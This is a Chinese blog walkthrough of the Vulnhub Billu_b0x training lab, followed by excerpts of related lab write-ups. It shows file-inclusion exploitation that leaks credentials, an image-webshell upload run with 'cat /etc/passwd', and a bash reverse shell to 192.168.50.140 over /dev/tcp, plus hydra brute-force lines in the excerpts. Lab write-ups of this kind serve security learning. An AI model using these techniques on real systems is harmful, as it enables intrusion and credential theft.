Vulnhub靶场第二关

最新推荐文章于 2025-03-08 10:56:47 发布
最新推荐文章于 2025-03-08 10:56:47 发布
阅读量392 收藏
点赞数 1
分类专栏: Vulnhub靶场第二关 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/L1928/article/details/108285073
版权
本文详细记录了在Vulnhub靶场Billu_b0x环境中,从Web应用渗透到获取root权限的全过程。通过nmap扫描、目录爆破、文件包含漏洞利用、数据库账号获取、图片马上传与执行,最终实现提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Vulnhub靶场 Billu_b0x
目标:
Boot to root:从Web应用程序进入虚拟机,并获得root权限.
运行环境:
靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。
攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、
AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。
1.使用nmap 扫描子网查找可用ip
在这里插入图片描述
2.访问这个ip
在这里插入图片描述
3.发现登录页面但是访问源码没有发现可用漏洞准备爆破目录
在这里插入图片描述
4.可以看到扫描到很多目录,依次访问,访问到test目录时发现问题,需要提供file参数,立刻想到文件包含漏洞
在这里插入图片描述
5.测试文件包含失败,转跳到了192.168.238.129
在这里插入图片描述
6.改变思路,利用burp抓包将get请求变为post请求再次尝试文件包含
在这里插入图片描述
7.包含成功,利用同样的方式查看其他目录
在这里插入图片描述
8.发现数据库账号密码成功登录
账号:billu
密码:b0x_billu
在这里插入图片描述
9.phpmyadmin的默认的配置文件是:config.inc.php,现在我们不知道路径,猜测路径在/var/www/phpmy下,猜测成功并且发现账户:root密码:roottoor
在这里插入图片描述
10.从数据库中获得首页登录账号:biLLu密码:hEx_it
在这里插入图片描述
11.返回首页登录
在这里插入图片描述
12.登陆成功
在这里插入图片描述
13.制作图片马并且上传
Cmd制作马命令:copy 12.jpg/b+1.php/a 12.jpg
上传成功后执行:
POST /panel.php?cmd=cat%20/etc/passwd;ls
load=/uploaded_images/12.jpg&continue=continue
在这里插入图片描述
14.
开始使用nc监听:
1.开启监听nc -lvnp 6666
2.同时利用burp的post请求执行echo “bash -i >& /dev/tcp/192.168.50.140/6666 0>&1” | bash
但是要进行url编码
3.执行python -c 'import pty;pty.spawn("/bin/bash")'命令得到交互shell
在这里插入图片描述
15.提权完成

1、VulnHub(基础准备)
weixin_43850732的博客
06-24 327
1、vulnhub基础准备扫描靶机IPNmapArp-scanNetdiscover开启简易HTTP服务python方式php方式 扫描靶机IP 默认在导入靶机镜像后是不知道靶机IP地址的,第一步是扫描发现到靶机的IP地址。 Nmap ping 扫描 nmap -sP 192.168.100.1/24 no ping 扫描 nmap -nP 192.168.100.1/24 Arp-scan arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2622
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
VulnHub 靶场--lazysysadmin
Beret-81的博客
03-18 506
VulnHub 靶场--lazysysadmin靶场搭建:靶场实战:00x0: 信息收集00x1:SMB 未授权访问00x2:登陆 PHPMyadmin00x3:登陆 Wordpress 后台00x4:爆破SSH 端口 靶场搭建: 下载完解压导入虚拟机,然后使用nat模式即可。 下载链接:https://download.vulnhub.com/lazysysadmin/Lazysysadmin...
六大知名Web安全漏洞靶场
最新发布
Cairo_A的博客
03-08 720
如果想搞懂一个漏洞,最好的方法是先编写出这个漏洞,然后利用它,最后修复它。漏洞靶场模拟真实环境,它为网络安全人员提供了一个安全可控的平台,用于发现、评估和测试应用程序、系统或网络设备的安全漏洞。WEB漏洞靶场可帮助安全人员熟悉SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等漏洞利用过程。0. 写在最前在非授权情况下,对于网站进行渗透测试攻击,是触及法律法规的,所以我们常常需要自己搭建一个漏洞靶场,避免直接对公网非授权目标进行测试。
[ vulnhub靶机通篇 ] 渗透测试综合靶场 DC-2 通详解 (附靶机搭建教程)
qq_51577576的博客
03-15 3277
[ vulnhub靶机通篇 ] 渗透测试综合靶场 DC-2 通详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
我的Webug通之路:第二(基础篇)
weixin_45822019的博客
03-14 327
第一步:拿到网页来发现网页是否存在问题 第二步:发现并不存在xss,按照网页提示下载到本地查看照片存在什么信息 使用WinHex查看照片的十六进制 第三步:将照片后缀名改为.zip来查看隐藏的是什么文件 ...
Vulnhub靶场第一
L1928的博客
08-28 450
Vulnhub靶场 Breach1.0 目标: Boot to root:获得root权限,查看flag。 运行环境: 靶机:网络连接方式设置为主机模式(host-only),静态IP是192.168.110.140。 攻击机:同网段下有Windows攻击机(物理机),IP地址:192.168.110.220,安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Python2.7、JDK、DirBuster、AWVS、Nessus等渗透工具,也可以使用Kali Linux攻击机。 端
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1314
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
玩转vulnhub靶场(非常详细),零基础入门到精通,看这一篇就够了
分享Python知识
10-21 4033
玩转vulnhub靶场(非常详细),零基础入门到精通,看这一篇就够了
2-vulnhub靶场,Earth
qq_49078152的博客
08-14 1744
vulnhub,earth靶机练习
vulnhub靶场-Prime1
ad12456的博客
03-30 3009
靶场练习,
Webug3.0 教程 第二:从图片中你能找到什么? 从图片中找到有用的东西
weixin_44716769的博客
11-14 425
Webug3.0 教程 第二:从图片中你能找到什么? 从图片中找到有用的东西 说明:以下步骤是我打靶场的记录,与大家分享我的学习过程,请各位大佬指正。 本题考点: ...
vulnhub(De-ICE S1.100, S1.110)
公众号shadow sock7
01-16 1254
学了两个vulnhub上的box De-ICE S1.100 De-ICE S1.110 非常详细的writeup: http://blog.nullmode.com/blog/2013/10/31/de-ice-s1-dot-100-level-1-a-beginners-guide/
VulnHub——DC-3
菜鸟的学习笔记
12-30 258
DC-3 信息搜集 使用nmap进行探测和扫描 已知信息: CMS为Joomla 访问网页,没有多余的提示,表明仅有一个入口点。 搜索后得知访问/modules/mod_login/mod_login.xml文件可以查看版本,发现版本为3.1,并且发现了一个路径。 /administrator/components/com_menus/models/fields,/adminisrtator为后台登陆页面。 漏洞挖掘与利用 1、既然发现是Joomla,那么从github查找相应的工具进行攻击。 找到
VulnHub—DC-7
weixin_39219503的博客
02-02 547
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-7,356/ 题目信息如下 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. W...
VulnHub-XXE
热门推荐
江左盟的博客
11-28 1万+
简介 本以为该靶机是利用XXE获取权限,做的过程中才发现该靶机不已拿权限为目的,该靶机为CTF题,目的在于学习XXE漏洞。 靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/ 信息收集 使用nmap --min-rate 10000 192.168.142.136 --script=vuln -sV扫描目标主机发现开启80和5355端口,80端口中间件为Apache 2.4.27,存在robots.txt文件,如图: 访问80端口为Apache默认页面,
Vulnhub--Gaara
从不专注的人的博客
06-16 484
目录Vulnhub--Gaara信息收集扫描目标网段扫描端口及服务版本目录扫描漏洞利用hydra破解ssh登陆进行提权查看文件 Vulnhub–Gaara 靶机下载地址:https://www.vulnhub.com/entry/gaara-1,629/ 信息收集 扫描目标网段 我们先使用nmap命令扫描网段 扫描端口及服务版本 然后我们访问80端口,没有发现什么有用的信息 目录扫描 然后我们来进行目录扫描 dir -u http://172.16.58.138/ -w /usr/share/dir
VulnHub_FunBox
qq_45434762的博客
08-29 634
发现目标主机我们使用nmap扫描整个网段sudo nmap 192.168.1.0/24 扫描端口使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口sudo n...
Vulnhub_Noob
qq_45434762的博客
09-18 1498
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无主机信息Kali:192.168.31.216Noob:192.168.31.192信息收集使用Nmap扫描探测目标主机开放了21、80、55055三个端口nmap -sS -p- 192.168.31...
vulnhub靶场 planets
08-28
vulnhub靶场"planets"是一个信息搜集与利用的主机发现的靶场。你可以在找到更多于该靶场的详细信息。 根据辐射测年估计和其他证据,地球形成于45亿年前。在地球历史的最初10亿年里,生命出现在海洋中,并开始影响地球的大气层和表面,导致厌氧生物和后来的需氧生物的扩散。一些地质证据表明,生命可能早在41亿年前就出现了。 如果你想登录vulnhub靶场"planets"的管理员界面,你可以使用用户名"terra"和密码"earthclimatechangebad4humans"登录https://earth.local/admin。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [vulnhub靶场——THE PLANETS:EARTH](https://blog.youkuaiyun.com/Czheisenberg/article/details/122900121)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH](https://blog.youkuaiyun.com/qq_57976347/article/details/122695436)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值